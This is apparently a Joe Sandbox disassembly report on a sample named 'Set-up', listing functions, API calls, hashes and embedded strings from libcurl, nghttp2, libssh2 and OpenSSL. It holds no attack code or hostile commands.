Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: fwrite
String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
API String ID: 3559309478-3911685517
Opcode ID: 3d5586f020b646d9d10b338a4e78bee1657d5d5e491a100452431faa9b03b4cf
Instruction ID: 128c3309d1767020fec2b1057eebf399ab0e0bb4d7e66f30ab574be628d27ad3
Opcode Fuzzy Hash: 3d5586f020b646d9d10b338a4e78bee1657d5d5e491a100452431faa9b03b4cf
Instruction Fuzzy Hash: 8281D4B2A08301ABE714DE24EC41B2BB6E5AF98754F08862DF94987392F735DD50C792

Function 00276210 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 184COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,0024DB9C,?,00273BB8,00000000,?,?), ref: 00276433

Strings

chunk->end == tbuf->buf.end, xrefs: 0027649B
stream_pop_outq_entry, xrefs: 0027647D
stream->outq_idx + 1 >= npopped, xrefs: 0027642E
chunk->begin == tbuf->buf.begin, xrefs: 002764C5
nghttp3_stream.c, xrefs: 00276429, 00276487, 00276496, 002764AB, 002764C0
nghttp3_ringbuf_len(chunks), xrefs: 002764B0

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
API String ID: 1222420520-1470553442
Opcode ID: bcede2e6f144ba925d72814fdd98d948bfda34b788d5571f52eea65c1348d3ca
Instruction ID: 5d87d8bedd57947ef92624be8ff353eedc8278f207a3807c7dc8c2f94a3981c9
Opcode Fuzzy Hash: bcede2e6f144ba925d72814fdd98d948bfda34b788d5571f52eea65c1348d3ca
Instruction Fuzzy Hash: EE719C70624305AFDB65DF24DC99BAE77A5FF84700F048929F84D9B391EB70A960CB42

Function 001EE760 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 448COMMON

Download Yara Rule

APIs

Part of subcall function 001F5EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001F5ED4

Part of subcall function 00214F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00214F9E

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 001EEA9B

Part of subcall function 001F06F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,001F5663,?), ref: 001F06F9

Strings

transfer.c, xrefs: 001EE7F2, 001EE97C, 001EEA7D, 001EEAA5, 001EEAE1, 001EEB46, 001EEB92, 001EEBA8, 001EEBCA, 001EEC43
HEAD, xrefs: 001EED9A, 001EEDA2
The redirect target URL could not be parsed: %s, xrefs: 001EE9E1
Issue another request to this URL: '%s', xrefs: 001EECA4
Clear auth, redirects scheme from %s to %s, xrefs: 001EEB84
GET, xrefs: 001EED95
Switch from POST to GET, xrefs: 001EED2B
Maximum (%ld) redirects followed, xrefs: 001EEC11
Switch to %s, xrefs: 001EEDA3
Clear auth, redirects to port from %u to %u, xrefs: 001EEB1B

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$atoistrcpy
String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
API String ID: 2444498485-4197959747
Opcode ID: 0dff84a1951426d0b7532870dac33f10395d0bfc49be61a5e820d85a64de9f67
Instruction ID: d48ae6d12ba4afeaa22ba70d197f1fd420d52f48fff77a7d14b70b400dd0fc7c
Opcode Fuzzy Hash: 0dff84a1951426d0b7532870dac33f10395d0bfc49be61a5e820d85a64de9f67
Instruction Fuzzy Hash: 5CF12371904784ABEB20AE11DC86BAA3BD4AF60304F084479FE499F2D3F771E9548762

Function 002BC290 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 318COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 002BC60E

Strings

Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 002BC444
Too small FXP_HANDLE, xrefs: 002BC582, 002BC675
Response too small, xrefs: 002BC4E3
Unable to allocate new SFTP handle structure, xrefs: 002BC646
Failed opening remote file, xrefs: 002BC531
feWould block waiting for status message, xrefs: 002BC4A6
Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 002BC410
Unable to send FXP_OPEN*, xrefs: 002BC45B
Too small FXP_STATUS, xrefs: 002BC517
Timeout waiting for status message, xrefs: 002BC4FB

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
API String ID: 3510742995-1499184223
Opcode ID: 72cab5fd704f3371457475affb23cac8be489297b85661f559c3c11ba0be736d
Instruction ID: 3a40cb9c040b222eeb691613d084163e03468c62179b329dba57a27793021f61
Opcode Fuzzy Hash: 72cab5fd704f3371457475affb23cac8be489297b85661f559c3c11ba0be736d
Instruction Fuzzy Hash: 5EB139709247419BD724CF24DC91BAB77F8FF84358F144A2CF45692292E770E928CB92

Function 0021C5E0 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 269stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(-00000004), ref: 0021C625

Strings

Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 0021C6CA
The requested document is not new enough, xrefs: 0021C971
Skipping time comparison, xrefs: 0021C7D5
`~, xrefs: 0021C6A0
%04d%02d%02d %02d:%02d:%02d GMT, xrefs: 0021C8BB
STOP, xrefs: 0021C9C3
MDTM failed: file does not exist or permission problem, continuing, xrefs: 0021C70D
The requested document is not old enough, xrefs: 0021C7AA
[%s] -> [%s], xrefs: 0021C9CF
unsupported MDTM reply format, xrefs: 0021C72D

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: %04d%02d%02d %02d:%02d:%02d GMT$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$MDTM failed: file does not exist or permission problem, continuing$STOP$Skipping time comparison$The requested document is not new enough$The requested document is not old enough$[%s] -> [%s]$`~$unsupported MDTM reply format
API String ID: 39653677-3282407959
Opcode ID: 7fc8284aaf9c41b0fb60d59dc2b31cb4be76ab93287f9556f8a70421476e93c1
Instruction ID: 0495b6bdde913f5b2430955f2e62ed79e732e159e0d393b56e18b54f70ca9f78
Opcode Fuzzy Hash: 7fc8284aaf9c41b0fb60d59dc2b31cb4be76ab93287f9556f8a70421476e93c1
Instruction Fuzzy Hash: 15B166741547865BC720CF24C884BFBBBE4AF61308F28442EE89987292E775F6B5CB51

Function 0025E280 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 453COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp2_is_fatal(rv),nghttp2_session.c,00001DE5), ref: 0025E54E

Strings

PUSH_PROMISE: stream closed, xrefs: 0025E86B
nghttp2_session.c, xrefs: 0025E544
PUSH_PROMISE: invalid promised_stream_id, xrefs: 0025E785
PUSH_PROMISE: push disabled, xrefs: 0025E5CE
PUSH_PROMISE: stream in idle, xrefs: 0025E72C
nghttp2_is_fatal(rv), xrefs: 0025E549
PUSH_PROMISE: invalid stream_id, xrefs: 0025E695
PUSH_PROMISE: stream_id == 0, xrefs: 0025E621

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: PUSH_PROMISE: invalid promised_stream_id$PUSH_PROMISE: invalid stream_id$PUSH_PROMISE: push disabled$PUSH_PROMISE: stream closed$PUSH_PROMISE: stream in idle$PUSH_PROMISE: stream_id == 0$nghttp2_is_fatal(rv)$nghttp2_session.c
API String ID: 1222420520-2595712376
Opcode ID: cde36346b32d2b9583f9cb5db28307ef90690cb06756d18d6de876b20e1409b7
Instruction ID: c85dca57c6f3177a8323239410825c7a1f39e60efaeed147cc5f05ba44b626d3
Opcode Fuzzy Hash: cde36346b32d2b9583f9cb5db28307ef90690cb06756d18d6de876b20e1409b7
Instruction Fuzzy Hash: 7EF17B30A24702ABDF384E348C01B7B7AD8AF9531AF05056CFC59862D2E771DA78CB55

Function 0025A530 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 420COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->state == NGHTTP2_STREAM_IDLE,nghttp2_session.c,00000528,?,?,-00000264,?,00000000,?,00000004,?), ref: 0025A93D
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES),nghttp2_session.c,0000052F,?,?,-00000264,?,00000000,?,00000004,?), ref: 0025A952
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream),nghttp2_session.c,0000052A,?,?,-00000264,?,00000000,?,00000004,?), ref: 0025A967
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(dep_stream,nghttp2_session.c,000005B2), ref: 0025A97C

Strings

nghttp2_session.c, xrefs: 0025A933, 0025A948, 0025A95D, 0025A972
dep_stream, xrefs: 0025A977
(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream), xrefs: 0025A962
!(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES), xrefs: 0025A94D
stream->state == NGHTTP2_STREAM_IDLE, xrefs: 0025A938

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: !(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES)$(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream)$dep_stream$nghttp2_session.c$stream->state == NGHTTP2_STREAM_IDLE
API String ID: 1222420520-184303863
Opcode ID: 5f49933eb229242464427b892ca916167cedad578cf6d2a4522bc8eb95d1ab74
Instruction ID: 9337a9accfbff34688d932cc7f351a252ac24b79b43203f60d72283125dd8488
Opcode Fuzzy Hash: 5f49933eb229242464427b892ca916167cedad578cf6d2a4522bc8eb95d1ab74
Instruction Fuzzy Hash: 4CE12C719243869BDB308F249C47BAB7BE4AF41306F084529EC494A282E775D978CF57

Function 0021E270 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 303stringCOMMON

Download Yara Rule

APIs

strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,0021CC57), ref: 0021F028

Strings

STOR_PREQUOTE, xrefs: 0021F1F7
%s%s%s, xrefs: 0021F07B
NLST, xrefs: 0021F05E, 0021F07A
SIZE %s, xrefs: 0021E406
TYPE %c, xrefs: 0021E323
[%s] -> [%s], xrefs: 0021E2E0, 0021E38E, 0021F116, 0021F203
LIST, xrefs: 0021F059, 0021F10A
ftp.c, xrefs: 0021F08A, 0021F0BD, 0021F13C

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strrchr
String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
API String ID: 3418686817-2910492138
Opcode ID: 7058c6f6edfa3bd0ba169cdc5f735cf3758a1e94806fa7fca174e7b5df1f6e90
Instruction ID: 36fa5a11ab0aaf0d1d8c254aebee3d600a3bd51c75ab53020901c74df27ac747
Opcode Fuzzy Hash: 7058c6f6edfa3bd0ba169cdc5f735cf3758a1e94806fa7fca174e7b5df1f6e90
Instruction Fuzzy Hash: CCA16771724305ABEB249A18DD05BF377D9ABA1308F0840B9FD588B283E776DDA1C791

Function 002BE420 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00201887,?,?,00000000,?,00000000,00000007), ref: 002BE43D

Strings

SFTP Protocol Error, xrefs: 002BE63E
Error waiting for FXP STATUS, xrefs: 002BE64F
Server does not support RENAME, xrefs: 002BE4B9
Unable to send FXP_RENAME command, xrefs: 002BE661
Unable to allocate memory for FXP_RENAME packet, xrefs: 002BE66A
File already exists and SSH_FXP_RENAME_OVERWRITE not specified, xrefs: 002BE673
Operation Not Supported, xrefs: 002BE67A
SFTP rename packet too short, xrefs: 002BE5F9

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _time64
String ID: Error waiting for FXP STATUS$File already exists and SSH_FXP_RENAME_OVERWRITE not specified$Operation Not Supported$SFTP Protocol Error$SFTP rename packet too short$Server does not support RENAME$Unable to allocate memory for FXP_RENAME packet$Unable to send FXP_RENAME command
API String ID: 1670930206-3556387644
Opcode ID: 1b3f5bee3294b938fcab7f83acc26c21b120451a5731b3460aa50e0762a93924
Instruction ID: dd03bfd1e6ef658e5fda3693a2e28f90cf0b6588d43fbe230abaa2f70167acb1
Opcode Fuzzy Hash: 1b3f5bee3294b938fcab7f83acc26c21b120451a5731b3460aa50e0762a93924
Instruction Fuzzy Hash: 2671E670914301AFDB209F24DC85BEB7BE8FF51354F05491DF9AA87292E771A824CB92

Function 0020A260 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 160networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?,00000080), ref: 0020A376
WSAGetLastError.WS2_32 ref: 0020A380

Part of subcall function 001D78B0: closesocket.WS2_32(?), ref: 001D78BB

Part of subcall function 0020EF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 0020EF6F

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0020A3D2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0020A3D6

Strings

Jh, xrefs: 0020A285
ssrem inet_ntop() failed with errno %d: %s, xrefs: 0020A3F4
cf-socket.c, xrefs: 0020A2E9
getpeername() failed with errno %d: %s, xrefs: 0020A3A0
accepted_set(sock=%d, remote=%s port=%d), xrefs: 0020A488

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _errno$ErrorLastclosesocketgetpeername
String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s$Jh
API String ID: 1501154218-931480536
Opcode ID: 56608f876f57de1daad468deaa627977f11727b5888506e1a0a6f0a61e2a5435
Instruction ID: 971416f8bea5050b03650fe59691eecf41db343fa1293a582c78f7ff8d830f80
Opcode Fuzzy Hash: 56608f876f57de1daad468deaa627977f11727b5888506e1a0a6f0a61e2a5435
Instruction Fuzzy Hash: D4512531914781AFDB21CF24CC46BEA77B4AF91314F044128FD9C47292EB72A999CB92

Function 00412370 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 0041238F
CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 004123C4
GetLastError.KERNEL32 ref: 00412433

Part of subcall function 00412240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0040F763,?,?,?,?,?), ref: 00412251
Part of subcall function 00412240: WideCharToMultiByte.KERNEL32 ref: 00412284
Part of subcall function 00412240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 004122BD

Strings

users/e_capi.c, xrefs: 004123A4, 00412426, 00412466
users/e_capi_err.c, xrefs: 00412400
ERR_CAPI_error, xrefs: 004123F9
capi_cert_get_fname, xrefs: 00412379
Error code= 0x, xrefs: 0041244F
%lX, xrefs: 0041243E

Memory Dump Source

